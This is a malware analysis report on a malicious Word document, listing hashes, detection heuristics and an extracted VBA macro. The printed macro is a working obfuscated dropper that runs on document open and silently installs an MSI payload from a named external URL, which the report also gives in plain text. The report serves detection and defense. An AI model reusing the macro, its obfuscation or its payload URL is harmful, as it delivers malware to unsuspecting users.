Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7aa4bf0cc69f3e9a…

MALICIOUS

Office (OLE)

57.0 KB Created: 2019-03-04 01:03:00 Authoring application: Microsoft Office Word First seen: 2021-02-23
MD5: 20fc5a09fb88c413a2f30b7e0e7155ba SHA-1: a17078ec379ec9feba015b90c631073fe858c0a2 SHA-256: 7aa4bf0cc69f3e9a4087fc134097739ccdfb4c6fbb2c332ff6b85582588aa403
192 Risk Score

Heuristics 8

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell (SkYqZeMkYvUr)
  • Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URL
    A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://lovetthornes.com/shipping/images/elmt.msi Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7776 bytes
SHA-256: 214d8f7fea0a56ed7251b445a8dba6d36ee3d5981164982ba4e5fbbf147a6888
Detection
ClamAV: No threats found
Obfuscation or payload: likely
173 of 201 identifiers look randomly generated (e.g. 'XlZoXwVkUjGq') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()

UiBmCbEmSlJj = 112843079

NxJkEsIpFnLh = 112843188
SiMvLuRvArTa = 112843194
MmVoCbRcYtOg = 112843184
CfQmYrSaNtOk = 112843180
JqIbByMiNxZt = 112843199
AfKyGwJmHfIr = 112843180
NeZaCeHkNnBb = 112843178
AsLbPcVrPqSd = 112843111
YeBaOrWiXuPw = 112843126
XlDtWiUuYnTt = 112843192
TnWfVmCnUvWu = 112843111
TvFhElYnYkGz = 112843126
UpQiOpEdHvFs = 112843184
RxJdUdXnIlJc = 112843111
DjJsIgXhTbZu = 112843183
FiImOnYlRgFm = 112843195
KhWtQrRmTbZn = 112843195
HpYkKlTpOfJe = 112843191
ZjIcVySlSiAd = 112843137
LvNyQnFgEeAp = 112843126
ZzPxClTsWcTc = 112843126
PaJzDaLwDdFa = 112843187
UxTdUbQpFhFa = 112843190
IhMoKtOqPvCb = 112843197
GqIsQeFvRvKc = 112843180
KqPdMcRiRyKr = 112843195
WpYpJrFsUfLs = 112843195
NdDoJrMfVuKe = 112843183
JkSzUzEbEyNq = 112843190
NkZdGlJgAiXy = 112843193
PzMuJbMaBcGk = 112843189
PzUdQaYnIuHf = 112843180
XpQkDyGrHxHc = 112843194
ZsSoNsXfPkUr = 112843125
RuUfRzRhZcKa = 112843178
IoDsBhJjBzAt = 112843190
RjClJhUyMyHj = 112843188
EkFjXlEqDaIn = 112843126
TvFgOvKkFsRs = 112843194
FkNnIhZhPhVr = 112843183
RkPmGmXgCaFx = 112843184
BeLyThEnLlBx = 112843191
BeYaGiZaYnGa = 112843191
QkEwPdBmHkLr = 112843184
AcAaNxDlApLw = 112843189
LkVuVzJgEwBy = 112843182
VsElOuXeUtHs = 112843126
AaOiMtCqGtFl = 112843184
TmOvHeEmEvYc = 112843188
FeNrOaScWtUf = 112843176
SeSlCdNpTbBa = 112843182
UhImAaIuBwXr = 112843180
LdJfZaLfMuYt = 112843194
PvCrKvIyWbKq = 112843126
BoBlApQfBiEl = 112843180
ZuUkGwMjTcFr = 112843187
NdFfVbUzWrZk = 112843188
YtDgMnKqIgHk = 112843195
TgWmDbWtOwLt = 112843125
IhPeEcItKjQb = 112843188
FdDqErFoJnYz = 112843194
XrAvMhItSuDf = 112843184

HtPfTwEnAuHm = NxJkEsIpFnLh - UiBmCbEmSlJj
DaZwQxUhGzIf = SiMvLuRvArTa - UiBmCbEmSlJj
QhFmEfUjBbUk = MmVoCbRcYtOg - UiBmCbEmSlJj
NiHdTmVpGkBj = CfQmYrSaNtOk - UiBmCbEmSlJj
KrUpThKtTmVf = JqIbByMiNxZt - UiBmCbEmSlJj
FoOrEmJiPqFd = AfKyGwJmHfIr - UiBmCbEmSlJj
EgAoPpPzEeJk = NeZaCeHkNnBb - UiBmCbEmSlJj
NzZaZvNbIeFs = AsLbPcVrPqSd - UiBmCbEmSlJj
NyAvGlNlEaGr = YeBaOrWiXuPw - UiBmCbEmSlJj
YeRmHlRdQwTt = XlDtWiUuYnTt - UiBmCbEmSlJj
JzRjUvVzErVx = TnWfVmCnUvWu - UiBmCbEmSlJj
AcHlKfZlRgYo = TvFhElYnYkGz - UiBmCbEmSlJj
DfPbYqLjUsOb = UpQiOpEdHvFs - UiBmCbEmSlJj
MiXmHzGbAuAv = RxJdUdXnIlJc - UiBmCbEmSlJj
MqFyLvAdTlZh = DjJsIgXhTbZu - UiBmCbEmSlJj
YxVzKoKuOhOp = FiImOnYlRgFm - UiBmCbEmSlJj
TqWgCgEnYbJl = KhWtQrRmTbZn - UiBmCbEmSlJj
ZoCcHvOwHnJs = HpYkKlTpOfJe - UiBmCbEmSlJj
MmRbZcFpMsVn = ZjIcVySlSiAd - UiBmCbEmSlJj
GyBgCuQeIzXh = LvNyQnFgEeAp - UiBmCbEmSlJj
TtBgNuHjUyMm = ZzPxClTsWcTc - UiBmCbEmSlJj
XgYkNdMcItGa = PaJzDaLwDdFa - UiBmCbEmSlJj
XlZoXwVkUjGq = UxTdUbQpFhFa - UiBmCbEmSlJj
BcSeMtQhAzOh = IhMoKtOqPvCb - UiBmCbEmSlJj
MtBsNaEuZyNo = GqIsQeFvRvKc - UiBmCbEmSlJj
CwTfLrTvGzAc = KqPdMcRiRyKr - UiBmCbEmSlJj
CyKwTeDnDhIi = WpYpJrFsUfLs - UiBmCbEmSlJj
GhWtMqDoSrZz = NdDoJrMfVuKe - UiBmCbEmSlJj
CeIiOtDeUjRt = JkSzUzEbEyNq - UiBmCbEmSlJj
CrRbArBrOyHv = NkZdGlJgAiXy - UiBmCbEmSlJj
BbViMdZeFmGi = PzMuJbMaBcGk - UiBmCbEmSlJj
EmVoWaYhPkQm = PzUdQaYnIuHf - UiBmCbEmSlJj
OhSdNlXfSqUi = XpQkDyGrHxHc - UiBmCbEmSlJj
HmAwWxBvEkPp = ZsSoNsXfPkUr - UiBmCbEmSlJj
QbNnPpMwLrEm = RuUfRzRhZcKa - UiBmCbEmSlJj
DoAnKtXcHvSg = IoDsBhJjBzAt - UiBmCbEmSlJj
RlQlFcMaSmVs = RjClJhUyMyHj - UiBmCbEmSlJj
ViOpRjCsYnRq = EkFjXlEqDaIn - UiBmCbEmSlJj
CvCjLlLwNsZs = TvFgOvKkFsRs - UiBmCbEmSlJj
XhLvPsGwIgQj = FkNnIhZhPhVr - UiBmCbEmSlJj
SfMgYuPdYjJi = RkPmGmXgCaFx - UiBmCbEmSlJj
WfLdJwAjHuJl = BeLyThEnLlBx - UiBmCbEmSlJj
HyQdVfIwWeZi = BeYaGiZaYnGa - UiBmCbEmSlJj
RjDnDcChDqTg = QkEwPdBmHkLr - UiBmCbEmSlJj
XuFvFxFoHfVm = AcAaNxDlApLw - UiBmCbEmSlJj
PlRcQpEwYvAw = LkVuVzJgEwBy - UiBmCbEmSlJj
FvDqNzKqTrKy = VsElOuXeUtHs - UiBmCbEmSlJj
MjHlEhJpWmWp = AaOiMtCqGtFl - UiBmCbEmSlJj
CgRzLhWpGmTf = TmOvHeEmEvYc - UiBmCbEmSlJj
PeTtFoNvZzQi = FeNrOaScWtUf - UiBmCbEmSlJj
VeHgYpAmGnEj = SeSlCdNpTbBa - UiBmCbEmSlJj
QcMlWsNdYtRv = UhImAaIuBwXr - UiBmCbEmSlJj
UgFtXxBkVqFs = LdJfZaLfMuYt - UiBmCbEmSlJj
PzQiNxBnQuDq = PvCrKvIyWbKq - UiBmCbEmSlJj
XrVpTqXnPaDh = BoBlApQfBiEl - UiBmCbEmSlJj
PkOgPxUaFqHd = ZuUkGwMjTcFr - UiBmCbEmSlJj
ObNnXiXsQzCl = NdFfVbUzWrZk - UiBmCbEmSlJj
YxPdNoUfSlWi = YtDgMnKqIgHk - UiBmCbEmSlJj
XdLiJsBfDcOs = TgWmDbWtOwLt - UiBmCbEmSlJj
WpBsEsCrZmTe = IhPeEcItKjQb - UiBmCbEmSlJj
YbEvHdSvUuRs = FdDqErFoJnYz - UiBmCbEmSlJj
YnAzWqQzOvWx = XrAvMhItSuDf - UiBmCbEmSlJj

YbQvVxMcHrEq = Chr(HtPfTwEnAuHm)
GzOwInSaQlEr = Chr(DaZwQxUhGzIf)
WoFsLuIyBsUn = Chr(QhFmEfUjBbUk)
JjRuAuYvGeRf = Chr(NiHdTmVpGkBj)
QkClDxPtWdXt = Chr(KrUpThKtTmVf)
ZlHwOrNoQaIr = Chr(FoOrEmJiPqFd)
GdHgToAfIlNq = Chr(EgAoPpPzEeJk)
GgSyPtLhYkTt = Chr(NzZaZvNbIeFs)
QpSlAiYmWmCh = Chr(NyAvGlNlEaGr)
SmCvMuTcJsOn = Chr(YeRmHlRdQwTt)
XrNyUgHoXjNx = Chr(JzRjUvVzErVx)
OiYcRfXtXkXt = Chr(AcHlKfZlRgYo)
PwHrNrKlHdLy = Chr(DfPbYqLjUsOb)
StOkLrUgWaUf = Chr(MiXmHzGbAuAv)
PwTuKhBuUfMs = Chr(MqFyLvAdTlZh)
IsIcSzDnJmXz = Chr(YxVzKoKuOhOp)
LrGoJjWuChUy = Chr(TqWgCgEnYbJl)
EwAnGoJxLpSt = Chr(ZoCcHvOwHnJs)
SbXdUdVqEhZw = Chr(MmRbZcFpMsVn)
BeGdCvKfBwEx = Chr(GyBgCuQeIzXh)
HqYkDpZaKfQm = Chr(TtBgNuHjUyMm)
ByJpTuDzYgIg = Chr(XgYkNdMcItGa)
TwDvWrWuFwQw = Chr(XlZoXwVkUjGq)
OnRfKqEpLpIg = Chr(BcSeMtQhAzOh)
XnJeQiCyZwZj = Chr(MtBsNaEuZyNo)
WiSiNmZxCmYu = Chr(CwTfLrTvGzAc)
BiGkWxHoGjVx = Chr(CyKwTeDnDhIi)
XxJjCpGjNrMf = Chr(GhWtMqDoSrZz)
WbByCrExFiQg = Chr(CeIiOtDeUjRt)
ShRzOxAqUdMq = Chr(CrRbArBrOyHv)
TfIzPiJvXuMc = Chr(BbViMdZeFmGi)
XiGuSaTbIkEp = Chr(EmVoWaYhPkQm)
OsCeMeChYoYj = Chr(OhSdNlXfSqUi)
JiDrTcJkIuPr = Chr(HmAwWxBvEkPp)
GrQnQhQxBjCo = Chr(QbNnPpMwLrEm)
GqLtFqKgNnEm = Chr(DoAnKtXcHvSg)
WdRpVqJgAyNx = Chr(RlQlFcMaSmVs)
BqYiLsEwJiNl = Chr(ViOpRjCsYnRq)
KcHrRlEsDqZd = Chr(CvCjLlLwNsZs)
DhMaAgRiDmGe = Chr(XhLvPsGwIgQj)
JrMsIfCjGgGz = Chr(SfMgYuPdYjJi)
DvTcRkNgNuPk = Chr(WfLdJwAjHuJl)
NbBiRrPxGeLn = Chr(HyQdVfIwWeZi)
FsAcBzTtUwFq = Chr(RjDnDcChDqTg)
GoNsXeZnUxVt = Chr(XuFvFxFoHfVm)
HtVaDxSwIaDm = Chr(PlRcQpEwYvAw)
AoXjFuAbGqBh = Chr(FvDqNzKqTrKy)
CnJjUhTzBsWo = Chr(MjHlEhJpWmWp)
AhLnTvHzHsHr = Chr(CgRzLhWpGmTf)
VuQmMvSyNwUx = Chr(PeTtFoNvZzQi)
OlPjXpTyJxWq = Chr(VeHgYpAmGnEj)
XzCgQwHiYeRw = Chr(QcMlWsNdYtRv)
MpQcXpBmFgWs = Chr(UgFtXxBkVqFs)
JlGtClLyGjIv = Chr(PzQiNxBnQuDq)
MkAeEkGgVdKt = Chr(XrVpTqXnPaDh)
CcFgAmXyYuAk = Chr(PkOgPxUaFqHd)
YdNlUdIkCeCv = Chr(ObNnXiXsQzCl)
ArMuDvSqSeNg = Chr(YxPdNoUfSlWi)
JhYnRaUsYtRa = Chr(XdLiJsBfDcOs)
PqAcAxDtArOf = Chr(WpBsEsCrZmTe)
WoSkEhHwWcMg = Chr(YbEvHdSvUuRs)
YjMyIvZhJcQz = Chr(YnAzWqQzOvWx)

SkYqZeMkYvUr = YbQvVxMcHrEq + GzOwInSaQlEr + WoFsLuIyBsUn + JjRuAuYvGeRf + QkClDxPtWdXt + ZlHwOrNoQaIr + GdHgToAfIlNq + GgSyPtLhYkTt + QpSlAiYmWmCh + SmCvMuTcJsOn + XrNyUgHoXjNx + OiYcRfXtXkXt + PwHrNrKlHdLy + StOkLrUgWaUf + PwTuKhBuUfMs + IsIcSzDnJmXz + LrGoJjWuChUy + EwAnGoJxLpSt + SbXdUdVqEhZw + BeGdCvKfBwEx + HqYkDpZaKfQm + ByJpTuDzYgIg + TwDvWrWuFwQw + OnRfKqEpLpIg + XnJeQiCyZwZj + WiSiNmZxCmYu + BiGkWxHoGjVx + XxJjCpGjNrMf + WbByCrExFiQg + ShRzOxAqUdMq + TfIzPiJvXuMc + XiGuSaTbIkEp + OsCeMeChYoYj + JiDrTcJkIuPr + GrQnQhQxBjCo + GqLtFqKgNnEm + WdRpVqJgAyNx + BqYiLsEwJiNl + KcHrRlEsDqZd + DhMaAgRiDmGe + JrMsIfCjGgGz + DvTcRkNgNuPk + NbBiRrPxGeLn + FsAcBzTtUwFq + GoNsXeZnUxVt + HtVaDxSwIaDm + AoXjFuAbGqBh + CnJjUhTzBsWo + AhLnTvHzHsHr + VuQmMvSyNwUx + OlPjXpTyJxWq + XzCgQwHiYeRw + MpQcXpBmFgWs + JlGtClLyGjIv + MkAeEkGgVdKt + CcFgAmXyYuAk + YdNlUdIkCeCv + ArMuDvSqSeNg + JhYnRaUsYtRa + PqAcAxDtArOf + WoSkEhHwWcMg + YjMyIvZhJcQz
Shell (SkYqZeMkYvUr)

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.